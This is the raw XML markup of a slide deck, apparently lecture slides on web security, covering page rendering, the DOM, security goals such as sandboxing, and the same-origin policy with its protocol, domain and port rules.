          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="5114125" y="3214600"/>
            <a:ext cx="0" cy="891000"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="E69138"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="486" name="Google Shape;486;p61"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3980750" y="3755025"/>
            <a:ext cx="3885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If the attacker somehow adds this JavaScript, the browser will send a POST request to the attacker’s server with the secret.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="487" name="Google Shape;487;p61"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="1764575" y="2523800"/>
            <a:ext cx="0" cy="1686300"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="19050" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="E69138"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="488" name="Google Shape;488;p61"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="701125" y="3755025"/>
            <a:ext cx="2397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Suppose the server returns some HTML with a secret JavaScript variable.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fade">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="1"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="487"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="8" presetID="1" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="9" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="4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85"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="1"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="485"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="15" presetID="1" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="16"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Rendering a Webpage</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="494" name="Google Shape;494;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Process of displaying (rendering) a webpage in a web browser:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>The browser receives HTML, CSS, and JavaScript from the server</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>HTML and CSS are parsed into a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>DOM (Document Object Model)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>JavaScript is interpreted and executed, possibly modifying the DOM</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>The painter uses the DOM to draw the webpage</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>DOM (Document Object Model)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: Cross-platform model for representing and interacting with objects in HTML</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>A tree of nodes</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Each node has a tag, attributes, and child nodes</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="495" name="Google Shape;495;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Security on the Web</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="501" name="Google Shape;50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 Brief History of the Web</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="112" name="Google Shape;11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14" name="Google Shape;51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#1: Web servers should be protected from unauthorized access</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Example: An attacker should not be able to hack into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>google.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> and provide malicious search results to users</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Protection: Server-side security</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Example: Protect the server computer from buffer overflow attacks</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="515" name="Google Shape;51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07" name="Google Shape;50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#2: A malicious website should not be able to damage our computer</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Example: Visiting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>evil.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> should not infect our computer with malware</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read/write files on our computer</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Protection: Sandboxing</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>JavaScript is not allowed to access files on our computer</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Privilege separation, least privilege</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Browsers are carefully written to avoid exploiting the browser's code (e.g. write the browser in a memory-safe language)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="508" name="Google Shape;50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21" name="Google Shape;521;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#3: A malicious website should not be able to tamper with our information or interactions on other websites</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 our emails or buy things with our Amazon account</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-342900" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1800"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Protection: Same-origin policy</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>The web browser prevents a website from accessing other </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" i="1"/>
              <a:t>unrelated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> websites</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="522" name="Google Shape;52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Same-Origin Policy</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="528" name="Google Shape;528;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 Definition</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="534" name="Google Shape;53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35" name="Google Shape;535;p6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Same-origin policy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>: A rule that prevents one website from tampering with other </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" i="1" dirty="0"/>
              <a:t>unrelated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t> websites</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202122"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Under the policy, a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>web browser </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202122"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>permits scripts contained in a first web page to access data in a second web page, but only if both web pages have the same </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="202122"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>origin</a:t>
            </a:r>
            <a:endParaRPr lang="en" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Enforced by the web browser</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Prevents a malicious website from tampering with behavior on other websites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9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="198500" y="1246825"/>
            <a:ext cx="8520600" cy="171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webpage has an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" b="1"/>
              <a:t>origin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> defined by its URL with three parts:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Protocol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: The protocol in the URL</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Domain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: The domain in the URL’s location</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" b="1">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Port</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>: The port in the URL’s location</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="■"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>If no port is specified, the default is 80 for HTTP and 443 for HTTPS</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="541" name="Google Shape;541;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42" name="Google Shape;542;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543" name="Google Shape;543;p69"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="601100" y="2961625"/>
            <a:ext cx="7715400" cy="65707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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>www.test.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>443</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>/assets/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>lock.PNG</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="544" name="Google Shape;544;p69"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="850750" y="3715925"/>
            <a:ext cx="7024500" cy="657073"/>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800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>www.test.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>/assets/images/404.png</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="545" name="Google Shape;545;p69"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4053675" y="4068225"/>
            <a:ext cx="21159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a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>80</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (default port)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9285"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Same-Origin Policy</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="551" name="Google Shape;551;p70"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="198500" y="1246825"/>
            <a:ext cx="8520600" cy="126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a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-317500" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Think string matching: The protocol, domain, and port strings must be equal</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="552" name="Google Shape;552;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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="553" name="Google Shape;553;p70"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="369450" y="2433913"/>
          <a:ext cx="8602725" cy="2297311"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{B0F23E48-BBB6-4CF5-8DF9-8C28CEC27F89}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="3118800">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="3075550">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2408375">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1200"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>First domain</a:t>
                      </a:r>
                      <a:endParaRPr>
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="91425" marR="91425" marT="91425" marB="91425"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="1200"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Second domain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t>Same origin?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Clr>
                          <a:schemeClr val="dk1"/>
                        </a:buClr>
                        <a:buSzPts val="1100"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
